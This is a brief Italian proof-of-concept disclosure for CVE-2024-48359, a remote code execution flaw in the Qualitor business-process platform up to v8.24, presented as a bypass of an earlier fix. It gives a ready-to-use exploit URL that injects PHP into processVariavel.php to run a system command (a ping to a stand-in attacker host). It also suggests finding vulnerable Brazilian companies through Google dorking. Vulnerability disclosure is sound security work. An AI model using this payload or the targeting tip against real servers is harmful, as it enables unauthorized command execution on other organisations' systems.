
CVE-2024-48359 PoC
CVE-2024-48359 | Qualitor <= v8.24 RCE
Qualitor è una piattaforma per la gestione dei processi aziendali, e questo sistema è presente in varie aziende in Brasile che possono essere identificate semplicemente utilizzando il Google dorking.
Il nostro team ha identificato una vulnerabilità nell'applicazione suscettibile di Remote Code Execution (RCE), che consente l'esecuzione remota di comandi di sistema.
Questo è un bypass per la correzione di CVE-2023-47253.
Basta inviare un codice PHP nella pagina processVariavel.php, ad esempio: /html/ad/adpesquisasql/request/processVariavel.php?gridValoresPopHidden=nl2br(stream_get_contents(popen('ping attacker.com', 'r')));

https://www.linkedin.com/in/xvinicius/
https://www.linkedin.com/in/hairrison-wenning-4631a4124/